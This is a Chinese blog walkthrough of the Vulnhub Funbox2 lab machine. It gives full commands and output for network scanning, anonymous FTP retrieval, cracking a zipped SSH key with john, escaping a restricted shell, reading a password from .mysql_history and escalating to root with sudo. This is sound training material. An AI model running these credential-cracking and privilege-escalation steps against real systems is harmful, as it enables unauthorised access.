首页 > 其他分享 >Vulnhub Funbox2靶机解题详细过程

Vulnhub Funbox2靶机解题详细过程

时间:2022-11-08 11:57:37浏览次数:52  
标签:ftp 00 rw zip Vulnhub tom 靶机 Funbox2 1477

Funbox2

识别目标主机IP地址

┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.116.0/16   |   Screen View: Unique Hosts                                                                                                                                                                      
                                                                                                                                                                                                                                           
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                                           
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                                          
 192.168.56.100  08:00:27:86:52:7b      1      60  PCS Systemtechnik GmbH                                                                                                                                                                  
 192.168.56.161  08:00:27:f8:00:eb      1      60  PCS Systemtechnik GmbH             

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.161

NMAP扫描

└─$ sudo nmap -sS -sV -sC -p- 192.168.56.161 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-07 22:14 EST
Nmap scan report for bogon (192.168.56.161)
Host is up (0.000076s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 anna.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 ariel.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 bud.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 cathrine.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 homer.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 jessica.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 john.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 marge.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 miriam.zip
| -r--r--r--   1 ftp      ftp          1477 Jul 25  2020 tom.zip
| -rw-r--r--   1 ftp      ftp           170 Jan 10  2018 welcome.msg
|_-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 zlatan.zip
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)
|   256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)
|_  256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/logs/
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:F8:00:EB (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.02 seconds
                                                                  

目标主机经NMAP扫描显示仅有3个开放端口: 21(FTP),22(ssh),80(http)

Get Access

首先从FTP服务开始,目标主机允许匿名范围,并且有zip压缩文件:

┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ ftp 192.168.56.161        
Connected to 192.168.56.161.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.56.161]
Name (192.168.56.161:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230-Welcome, archive user [email protected] !
230-
230-The local time is: Tue Nov 08 03:15:44 2022
230-
230-This is an experimental FTP server.  If you have any unusual problems,
230-please report them via e-mail to <root@funbox2>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||49020|)
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 anna.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 ariel.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 bud.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 cathrine.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 homer.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 jessica.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 john.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 marge.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 miriam.zip
-r--r--r--   1 ftp      ftp          1477 Jul 25  2020 tom.zip
-rw-r--r--   1 ftp      ftp           170 Jan 10  2018 welcome.msg
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 zlatan.zip
226 Transfer complete
ftp> get anna.zip
local: anna.zip remote: anna.zip
229 Entering Extended Passive Mode (|||46677|)
150 Opening BINARY mode data connection for anna.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        2.65 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.16 MiB/s)
ftp> get ariel.zip
local: ariel.zip remote: ariel.zip
229 Entering Extended Passive Mode (|||51357|)
150 Opening BINARY mode data connection for ariel.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        2.50 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.47 MiB/s)
ftp> get bud.zip
local: bud.zip remote: bud.zip
229 Entering Extended Passive Mode (|||50686|)
150 Opening BINARY mode data connection for bud.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        2.51 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (157.49 KiB/s)
ftp> get cathrine.zip
local: cathrine.zip remote: cathrine.zip
229 Entering Extended Passive Mode (|||64610|)
150 Opening BINARY mode data connection for cathrine.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        2.95 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.61 MiB/s)
ftp> get homer.zip
local: homer.zip remote: homer.zip
229 Entering Extended Passive Mode (|||54262|)
150 Opening BINARY mode data connection for homer.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        2.65 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.64 MiB/s)
ftp> get jessica.zip
local: jessica.zip remote: jessica.zip
229 Entering Extended Passive Mode (|||13991|)
150 Opening BINARY mode data connection for jessica.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        2.23 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.37 MiB/s)
ftp> get john.zip
local: john.zip remote: john.zip
229 Entering Extended Passive Mode (|||43465|)
150 Opening BINARY mode data connection for john.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        2.70 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.77 MiB/s)
ftp> get marge.zip
local: marge.zip remote: marge.zip
229 Entering Extended Passive Mode (|||22454|)
150 Opening BINARY mode data connection for marge.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        2.78 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.50 MiB/s)
ftp> get miriam.zip
local: miriam.zip remote: miriam.zip
229 Entering Extended Passive Mode (|||15812|)
150 Opening BINARY mode data connection for miriam.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        3.00 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.90 MiB/s)
ftp> get tom.zip
local: tom.zip remote: tom.zip
229 Entering Extended Passive Mode (|||46681|)
150 Opening BINARY mode data connection for tom.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        1.93 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.05 MiB/s)
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
229 Entering Extended Passive Mode (|||36931|)
150 Opening BINARY mode data connection for welcome.msg (170 bytes)
100% |***********************************************************************************************************************************************************************************************|   170        9.00 MiB/s    00:00 ETA
226 Transfer complete
170 bytes received in 00:00 (790.54 KiB/s)
ftp> get zlatan.zip
local: zlatan.zip remote: zlatan.zip
229 Entering Extended Passive Mode (|||30105|)
150 Opening BINARY mode data connection for zlatan.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        2.72 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.13 MiB/s)
ftp> quit
221 Goodbye.
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ ls
anna.zip  ariel.zip  bud.zip  cathrine.zip  homer.zip  jessica.zip  john.zip  marge.zip  miriam.zip  nmap_full_scan  tom.zip  welcome.msg  zlatan.zip
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ cat welcome.msg   
Welcome, archive user %U@%R !

The local time is: %T

This is an experimental FTP server.  If you have any unusual problems,
please report them via e-mail to <root@%L>.


将这些zip压缩文件下载到Kali Linux本地。

┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ unzip anna.zip 
Archive:  anna.zip
[anna.zip] id_rsa password:                                                                                                                                                                                                                                             

! anna_hash : No such file or directory
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ zip2john anna.zip > anna_hash
ver 2.0 efh 5455 efh 7875 anna.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt anna_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2022-11-07 22:19) 0g/s 8853Kp/s 8853Kc/s 8853KC/s !LUVDKR!..*7¡Vamos!
Session completed. 
                                            

从文件名的规律看,应该是一系列用户名,而且可能是ssh 私钥文件,但是无法破解,可能这是一个陷阱,但是我们注意到所有zip文件的权限并不完全相同,只有tom.zip没有写权限

试一下破解这个文档:

┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ zip2john tom.zip > tom_hash  
ver 2.0 efh 5455 efh 7875 tom.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt tom_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iubire           (tom.zip/id_rsa)     
1g 0:00:00:00 DONE (2022-11-07 22:21) 25.00g/s 102400p/s 102400c/s 102400C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                           

利用john破解工具很快就拿到了口令,用该口令打开tom.zip压缩文件,从而成功登录tom的shell

┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ ssh -i id_rsa [email protected] 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Nov  8 03:23:16 UTC 2022

  System load:  0.16              Processes:             98
  Usage of /:   65.1% of 4.37GB   Users logged in:       0
  Memory usage: 34%               IP address for enp0s3: 192.168.56.161
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.


Last login: Sat Jul 25 12:25:33 2020 from 192.168.178.143
tom@funbox2:~$ id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

tom@funbox2:~$ pwd
/home/tom
tom@funbox2:~$ cd /var/www
-rbash: cd: restricted
tom@funbox2:~$ 

这是一个受限的shell, 但是输入bash -i,即可成为Interactive shell,

也可以通过下面的方法获得交互式shell:


tom@funbox2:/var/www/html$ cd /home
tom@funbox2:/home$ ls
tom
tom@funbox2:/home$ cd tome
bash: cd: tome: No such file or directory
tom@funbox2:/home$ cd tom
tom@funbox2:~$ ls
tom@funbox2:~$ ls -alh
total 40K
drwxr-xr-x 5 tom  tom  4.0K Jul 25  2020 .
drwxr-xr-x 3 root root 4.0K Jul 25  2020 ..
-rw------- 1 tom  tom     6 Jul 25  2020 .bash_history
-rw-r--r-- 1 tom  tom   220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 tom  tom  3.7K Apr  4  2018 .bashrc
drwx------ 2 tom  tom  4.0K Jul 25  2020 .cache
drwx------ 3 tom  tom  4.0K Jul 25  2020 .gnupg
-rw------- 1 tom  tom   295 Jul 25  2020 .mysql_history
-rw-r--r-- 1 tom  tom   807 Apr  4  2018 .profile
drwx------ 2 tom  tom  4.0K Jul 25  2020 .ssh
-rw-r--r-- 1 tom  tom     0 Jul 25  2020 .sudo_as_admin_successful
-rw------- 1 tom  tom     0 Jul 25  2020 .viminfo
tom@funbox2:~$ cat .mysql_history 
_HiStOrY_V2_
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
use\040support
create\040table\040users;
show\040tables
;
select\040*\040from\040support
;
show\040tables;
select\040*\040from\040support;
insert\040into\040support\040(tom,\040xx11yy22!);
quit
tom@funbox2:~$ 

这里似乎有用户名和密码: tom xx11yy22! (\040是空格编码)

接下来就简单了:

tom@funbox2:~$ sudo -l
[sudo] password for tom: 
Matching Defaults entries for tom on funbox2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tom may run the following commands on funbox2:
    (ALL : ALL) ALL
tom@funbox2:~$ sudo su
root@funbox2:/home/tom# id 
uid=0(root) gid=0(root) groups=0(root)
root@funbox2:/home/tom# cd /root
root@funbox2:~# ls
flag.txt
root@funbox2:~# cat flag.txt
   ____  __  __   _  __   ___   ____    _  __             ___ 
  / __/ / / / /  / |/ /  / _ ) / __ \  | |/_/            |_  |
 / _/  / /_/ /  /    /  / _  |/ /_/ / _>  <             / __/ 
/_/    \____/  /_/|_/  /____/ \____/ /_/|_|       __   /____/ 
           ____ ___  ___  / /_ ___  ___/ /       / /          
 _  _  _  / __// _ \/ _ \/ __// -_)/ _  /       /_/           
(_)(_)(_)/_/   \___/\___/\__/ \__/ \_,_/       (_)            
                                                              
from @0815R2d2 with ♥
root@funbox2:~# 

成功拿到root flag!!!

标签:ftp,00,rw,zip,Vulnhub,tom,靶机,Funbox2,1477
From: https://www.cnblogs.com/jason-huawen/p/16869179.html

相关文章

  • VulnHub-GoldenEye-1-Walkthrough
    靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/下载成功过后使用虚拟机打开需要注意:靶机和kail的网络适配器需要一致,不然会扫描不出来,这里我使用的的nat模式......
  • Vulnhub Backdoored靶机解题过程
    Backdoored识别目标主机IP地址把目标主机导入VirtualBox后,发现KaliLinux扫描不到目标主机的IP地址,因此需要首先解决没有自动获得IP地址的问题,解决过程见【靶机攻略】相......
  • Vulnhub THM Containme靶机解题过程
    THMContainmev4识别目标主机IP地址VirtualBox中启动THMContainme靶机kaliLinux利用netdiscover识别其IP地址:┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]└─$......
  • Vulnhub NiveK靶机完整解题过程
    NiveK识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/Nivek]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.98.0/16|ScreenView:UniqueHost......
  • Vulnhub Jerome靶机解题过程(未完成)
    Jerome识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/Jerome]└─$sudonetdiscover-ieth1Currentlyscanning:172.16.95.0/16|ScreenView:UniqueHos......
  • Vulnhub Vulnerable Docker Containment靶机解题过程(部分,未完成)
    VulnerableDockerContainment识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.60.0/1......
  • Vulnhub Snakeoil靶机解题(过程非常麻烦,需要一直用burpsuite)
    Snakeoil识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/SnakeOil]└─$sudonetdiscover-iethCurrentlyscanning:192.168.122.0/16|ScreenView:UniqueHo......
  • vulnhub靶场之CORROSION: 2
    准备:攻击机:虚拟机kali、本机win10。靶机:CORROSION:2,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/corrosion/Corrosion2.ov......
  • vulnhub靶场之NOOB: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:NOOB:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/noob/Noob.ova.torrent,下载后......
  • Vulnhub Lin.Security靶机解题过程
    Lin.Security靶机地址:http://www.vulnhub.com/entry/linsecurity-1,244/由于靶机的作者直接给出了ssh用户名和密码,本题非常简单识别目标主机IP地址─(kali㉿kali)-[~/V......